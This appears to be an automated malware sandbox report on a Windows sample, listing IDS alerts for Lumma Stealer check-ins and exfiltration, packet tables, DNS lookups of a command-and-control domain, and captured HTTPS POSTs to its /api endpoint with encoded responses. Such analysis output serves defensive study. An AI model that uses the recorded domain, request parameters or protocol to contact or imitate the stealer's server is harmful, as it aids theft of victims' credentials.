              2024-07-27T11:25:57.781939+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974513.85.23.86192.168.2.4
              2024-07-27T11:25:06.794685+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49731443192.168.2.4188.114.97.3
              2024-07-27T11:25:10.219474+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49734443192.168.2.4188.114.97.3
              2024-07-27T11:25:05.275348+0200UDP2054592ET MALWARE Lumma Stealer Domain in DNS Lookup (outpointsozp .shop)5478253192.168.2.41.1.1.1
              2024-07-27T11:25:07.307893+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49732443192.168.2.4188.114.97.3
              2024-07-27T11:25:11.033471+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49734443192.168.2.4188.114.97.3
              2024-07-27T11:25:07.786991+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49732443192.168.2.4188.114.97.3
              2024-07-27T11:25:11.748222+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49735443192.168.2.4188.114.97.3
              2024-07-27T11:25:13.537183+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49736443192.168.2.4188.114.97.3

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 27, 2024 11:25:05.299767971 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:05.299860001 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:05.300129890 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:05.303268909 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:05.303320885 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:05.948255062 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:05.948522091 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:05.973146915 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:05.973226070 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:05.974159956 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:06.026998043 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.116075039 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.116075039 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.116374969 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:06.794523001 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:06.794744968 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:06.794951916 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.797064066 CEST49731443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.797126055 CEST44349731188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:06.800503969 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.800548077 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:06.800692081 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.801084995 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:06.801100016 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.307612896 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.307893038 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.309052944 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.309067011 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.309391022 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.310892105 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.310931921 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.310972929 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.786885977 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.787554026 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.787611008 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.787616968 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.787636995 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.787709951 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.789222002 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.790679932 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.790735006 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.790750027 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.790828943 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.790880919 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.790889025 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.793632984 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.793690920 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.793698072 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.794847012 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.794895887 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.794903040 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.839421988 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.877983093 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.878320932 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.878400087 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.878528118 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.878540993 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:07.878571033 CEST49732443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:07.878575087 CEST44349732188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:08.040102005 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.040189028 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:08.040457964 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.040868044 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.040930033 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:08.531033993 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:08.531260014 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.532517910 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.532571077 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:08.532917023 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:08.534120083 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.534307003 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.534357071 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:08.534495115 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:08.534524918 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:09.041877031 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:09.042108059 CEST44349733188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:09.042366028 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:09.042366028 CEST49733443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:09.122564077 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:09.122644901 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:09.122734070 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:09.122967005 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:09.122986078 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:10.219264984 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:10.219474077 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:10.220812082 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:10.220866919 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:10.221251011 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:10.222336054 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:10.222336054 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:10.222430944 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.033313036 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.033415079 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.033590078 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.033591032 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.258521080 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.258585930 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.258654118 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.258903027 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.258919001 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.339618921 CEST49734443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.339679956 CEST44349734188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.747947931 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.748222113 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.749226093 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.749236107 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.749630928 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.751230955 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.751354933 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.751388073 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:11.751449108 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:11.751457930 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:12.287137032 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:12.287228107 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:12.287273884 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:12.287378073 CEST49735443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:12.287401915 CEST44349735188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:12.599539042 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:12.599570990 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:12.599627018 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:12.599884033 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:12.599889994 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:13.089148998 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:13.089586973 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:13.090775013 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:13.090785980 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:13.091248989 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:13.092319012 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:13.092474937 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:13.092479944 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:13.537169933 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:13.537372112 CEST44349736188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:13.537395000 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:13.537481070 CEST49736443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.111745119 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.111794949 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.111881971 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.112258911 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.112281084 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.578583956 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.578751087 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.579834938 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.579888105 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.580122948 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.581213951 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.581895113 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.581976891 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582128048 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.582178116 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582356930 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.582422972 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582643032 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.582714081 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.582952976 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583019018 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583300114 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583350897 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583374023 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583408117 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583626032 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583678961 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.583722115 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583818913 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.583888054 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.592782974 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.593242884 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.593334913 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.593403101 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.593463898 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:14.593563080 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:14.597615004 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.891309023 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.891381025 CEST44349737188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.891621113 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.891762018 CEST49737443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.933255911 CEST49738443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.933299065 CEST44349738188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:16.937639952 CEST49738443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.937639952 CEST49738443192.168.2.4188.114.97.3
              Jul 27, 2024 11:25:16.937684059 CEST44349738188.114.97.3192.168.2.4
              Jul 27, 2024 11:25:17.261559963 CEST49738443192.168.2.4188.114.97.3

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 27, 2024 11:25:05.275347948 CEST5478253192.168.2.41.1.1.1
              Jul 27, 2024 11:25:05.293972015 CEST53547821.1.1.1192.168.2.4

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 27, 2024 11:25:05.275347948 CEST192.168.2.41.1.1.10x7baeStandard query (0)outpointsozp.shopA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 27, 2024 11:25:05.293972015 CEST1.1.1.1192.168.2.40x7baeNo error (0)outpointsozp.shop188.114.97.3A (IP address)IN (0x0001)false
              Jul 27, 2024 11:25:05.293972015 CEST1.1.1.1192.168.2.40x7baeNo error (0)outpointsozp.shop188.114.96.3A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • outpointsozp.shop

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449731188.114.97.34436820C:\Users\user\Desktop\rwsNDpQSKZ.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:25:06 UTC264OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 8
              Host: outpointsozp.shop
              2024-07-27 09:25:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
              Data Ascii: act=life
              2024-07-27 09:25:06 UTC800INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:06 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=pgumu3v13r29g7vmieb64e41lh; expires=Wed, 20-Nov-2024 03:11:45 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYTvxylynX9BEupJV%2BtLnLtTjTD8liAvj75EQDt0HylbJmfyWvuikr46dbJzcBlbpMW6GSDmhnmWZrgo50Sejg7B6fZmtV0h62o5CGQ7EjQUKS3fI2xMDMHOnC1INN2sRiST0A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94899b800f73-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:06 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
              Data Ascii: 2ok
              2024-07-27 09:25:06 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.449732188.114.97.34436820C:\Users\user\Desktop\rwsNDpQSKZ.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:25:07 UTC265OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 54
              Host: outpointsozp.shop
              2024-07-27 09:25:07 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 65 64 66 62 4d 45 2d 2d 72 65 76 65 72 73 65 70 72 6f 78 79 26 6a 3d
              Data Ascii: act=recive_message&ver=4.0&lid=edfbME--reverseproxy&j=
              2024-07-27 09:25:07 UTC802INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:07 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=qk7goj2pskjqhk41je7ffgrvh3; expires=Wed, 20-Nov-2024 03:11:46 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kv6jlZ6xdvK0Z7vigCpQMbz5X0J4xJGTLNV5byMIy1dkdbWbiI%2Bxxzn7sgRF9ekGXuf0Z9UdDl2QaO4Yvw5vC8zqDEi0RtOFMQ0YS8KUsUXlEQHN7jXg%2BAfeUHLluXDqUYI0AA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94912c3d43f9-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:07 UTC567INData Raw: 31 64 62 37 0d 0a 31 55 77 69 62 6f 2f 75 36 73 62 65 6d 6b 4d 6d 31 6e 46 75 64 42 59 67 51 6b 34 68 5a 69 54 4b 49 36 2f 7a 5a 62 71 70 41 43 65 75 62 6c 52 4d 74 64 72 47 35 4b 33 2f 59 52 79 69 41 78 73 52 4f 67 49 6a 4b 67 4e 63 51 71 74 50 33 4a 5a 4a 6d 4e 39 74 42 65 38 71 51 77 4c 38 69 38 62 6b 75 2b 4a 68 48 49 30 4b 54 42 46 34 41 6e 68 73 52 41 78 47 71 30 2f 4e 6b 67 37 56 32 57 78 45 76 53 42 46 42 75 71 4e 6a 71 65 79 39 79 5a 44 73 78 41 45 47 6e 39 4e 4b 69 4d 44 53 67 61 76 57 59 33 4a 52 2f 66 4d 64 45 61 59 4c 56 45 46 72 5a 50 47 76 66 7a 2f 4c 51 54 73 55 77 38 52 64 45 77 6b 4b 6b 6f 4f 54 4b 4a 48 7a 4a 63 50 79 73 42 6d 54 37 30 75 52 67 66 67 68 4a 71 71 75 50 41 74 52 62 6b 51 54 46 67 30 52 54 68 73 47 30 51 56 6d 6b 4c 63 67
              Data Ascii: 1db71Uwibo/u6sbemkMm1nFudBYgQk4hZiTKI6/zZbqpACeublRMtdrG5K3/YRyiAxsROgIjKgNcQqtP3JZJmN9tBe8qQwL8i8bku+JhHI0KTBF4AnhsRAxGq0/Nkg7V2WxEvSBFBuqNjqey9yZDsxAEGn9NKiMDSgavWY3JR/fMdEaYLVEFrZPGvfz/LQTsUw8RdEwkKkoOTKJHzJcPysBmT70uRgfghJqquPAtRbkQTFg0RThsG0QVmkLcg
              2024-07-27 09:25:07 UTC1369INData Raw: 34 4b 50 73 76 7a 6e 62 31 33 30 46 41 42 57 4c 41 49 75 4b 55 77 57 52 37 70 45 77 34 4d 4c 33 63 31 76 52 72 6b 75 52 51 76 67 67 6f 36 6a 76 2f 41 6c 52 62 6f 66 42 68 56 77 51 57 42 69 41 77 4e 65 36 42 6d 4e 6f 41 54 63 7a 48 42 47 75 57 35 66 51 76 54 4d 6a 36 6a 38 6f 47 46 4f 73 68 34 46 48 58 4e 4b 4c 44 35 49 43 30 57 68 52 73 75 62 42 4e 44 42 5a 45 75 32 4b 55 55 4c 2f 34 4b 44 71 62 2f 79 4a 77 54 36 55 77 73 4f 4e 42 70 67 41 6b 41 56 55 4a 70 43 33 49 42 48 78 34 56 37 42 62 41 69 41 46 53 74 68 59 43 72 73 66 55 72 53 72 45 65 42 52 64 31 54 79 59 6e 51 67 78 4f 72 45 62 4e 6c 51 72 58 78 57 4a 4c 76 79 74 45 42 75 54 4d 78 75 53 37 34 47 45 63 39 43 4d 42 47 6e 39 4f 59 68 6c 41 43 6b 69 76 56 34 32 4f 53 63 47 4c 5a 55 6e 33 64 67 41 65
              Data Ascii: 4KPsvznb130FABWLAIuKUwWR7pEw4ML3c1vRrkuRQvggo6jv/AlRbofBhVwQWBiAwNe6BmNoATczHBGuW5fQvTMj6j8oGFOsh4FHXNKLD5IC0WhRsubBNDBZEu2KUUL/4KDqb/yJwT6UwsONBpgAkAVUJpC3IBHx4V7BbAiAFSthYCrsfUrSrEeBRd1TyYnQgxOrEbNlQrXxWJLvytEBuTMxuS74GEc9CMBGn9OYhlACkivV42OScGLZUn3dgAe
              2024-07-27 09:25:07 UTC1369INData Raw: 43 37 2b 57 45 4b 39 42 51 55 56 69 77 43 46 6a 78 4f 43 47 69 6a 54 63 54 52 47 4a 62 53 49 6b 4b 37 62 68 68 4d 36 59 43 41 72 72 50 78 4b 30 36 37 47 67 77 65 66 55 73 6a 4c 45 38 43 52 36 52 4e 77 4a 51 45 33 63 5a 6e 52 62 73 70 52 77 32 74 77 73 69 6a 70 4c 68 35 42 49 51 65 41 42 31 34 41 42 55 76 54 51 70 42 76 67 48 53 33 78 36 59 7a 47 34 46 37 32 35 50 44 65 43 47 67 36 71 77 2b 53 46 41 74 78 6b 4d 47 58 46 45 4b 43 56 44 46 6b 47 6e 51 4d 79 61 44 4e 58 46 5a 30 53 79 4b 51 42 43 72 59 75 51 35 4f 53 34 44 47 32 4f 55 78 4e 59 62 51 49 6e 49 41 4e 63 42 71 78 4c 7a 5a 77 4e 30 38 52 68 51 72 6b 75 54 51 62 2f 68 49 69 6b 73 76 34 67 53 4c 45 53 41 42 56 6d 54 69 59 68 52 51 78 55 36 41 2b 4e 6c 68 2b 59 6b 79 4a 6c 76 43 4a 44 41 4f 79 4c 79
              Data Ascii: C7+WEK9BQUViwCFjxOCGijTcTRGJbSIkK7bhhM6YCArrPxK067GgwefUsjLE8CR6RNwJQE3cZnRbspRw2twsijpLh5BIQeAB14ABUvTQpBvgHS3x6YzG4F725PDeCGg6qw+SFAtxkMGXFEKCVDFkGnQMyaDNXFZ0SyKQBCrYuQ5OS4DG2OUxNYbQInIANcBqxLzZwN08RhQrkuTQb/hIiksv4gSLESABVmTiYhRQxU6A+Nlh+YkyJlvCJDAOyLy
              2024-07-27 09:25:07 UTC1369INData Raw: 75 54 61 59 51 41 42 68 7a 54 43 77 69 54 67 35 46 70 51 47 44 30 51 44 41 69 7a 6f 46 6d 79 6c 4e 49 75 61 41 6a 2b 53 6a 74 6a 67 45 73 78 39 4d 54 6a 52 4f 4b 69 42 4b 42 45 2b 74 53 63 61 59 41 74 6e 41 5a 30 61 78 49 30 38 46 2f 34 61 4c 71 72 2f 30 4c 55 4b 31 45 42 34 65 66 51 4a 75 62 45 51 63 42 76 41 42 37 4a 38 4b 7a 4d 78 79 42 61 68 67 57 55 7a 71 67 4d 6a 38 2f 50 73 67 53 37 63 53 41 52 42 39 53 69 41 71 52 67 74 4c 70 6b 62 4b 6b 51 72 57 78 47 52 4e 75 69 4a 4c 41 75 53 4b 69 4b 57 32 75 47 38 45 73 77 74 4d 54 6a 52 79 49 79 78 44 48 77 61 33 44 39 54 52 41 4e 53 4c 4f 67 57 6c 4a 45 6b 4d 37 6f 4f 50 6f 4c 66 30 4a 45 47 37 45 41 55 54 66 55 77 79 4a 55 30 4d 54 71 64 45 78 70 45 4b 30 73 64 69 52 76 64 67 41 41 76 31 7a 4e 44 6b 6a 76
              Data Ascii: uTaYQABhzTCwiTg5FpQGD0QDAizoFmylNIuaAj+SjtjgEsx9MTjROKiBKBE+tScaYAtnAZ0axI08F/4aLqr/0LUK1EB4efQJubEQcBvAB7J8KzMxyBahgWUzqgMj8/PsgS7cSARB9SiAqRgtLpkbKkQrWxGRNuiJLAuSKiKW2uG8EswtMTjRyIyxDHwa3D9TRANSLOgWlJEkM7oOPoLf0JEG7EAUTfUwyJU0MTqdExpEK0sdiRvdgAAv1zNDkjv
              2024-07-27 09:25:07 UTC1369INData Raw: 46 51 4d 66 64 30 45 70 4b 30 73 49 54 4b 74 47 6a 64 39 48 33 39 4d 69 48 66 63 4e 56 78 7a 67 7a 4a 66 71 70 62 67 6d 53 50 52 4c 54 42 35 35 53 69 6f 6f 52 41 6c 42 72 6b 6a 66 6d 41 4c 57 79 32 5a 4f 75 43 68 45 44 2b 32 65 6a 71 43 30 2b 79 78 4a 75 68 41 49 56 6a 6f 43 4a 7a 51 44 58 41 61 61 54 4d 4f 4b 43 4e 2f 61 61 41 57 6f 59 46 6c 4d 36 6f 44 49 2f 50 7a 38 4c 31 61 2f 45 67 63 64 65 6b 55 76 4b 55 6b 45 53 61 78 43 77 35 6f 47 32 38 4e 76 53 4c 6b 6b 53 51 58 71 67 49 79 6a 2f 4c 5a 68 51 36 78 54 56 46 5a 66 59 77 30 41 52 42 34 47 74 77 2f 55 30 51 44 55 69 7a 6f 46 75 79 64 4d 42 75 61 4c 67 71 71 31 39 69 70 57 70 68 41 49 46 58 31 42 4a 79 56 4e 42 45 47 74 54 38 71 51 44 4e 7a 42 59 55 50 33 59 41 41 4c 39 63 7a 51 35 4a 44 37 49 55 6d
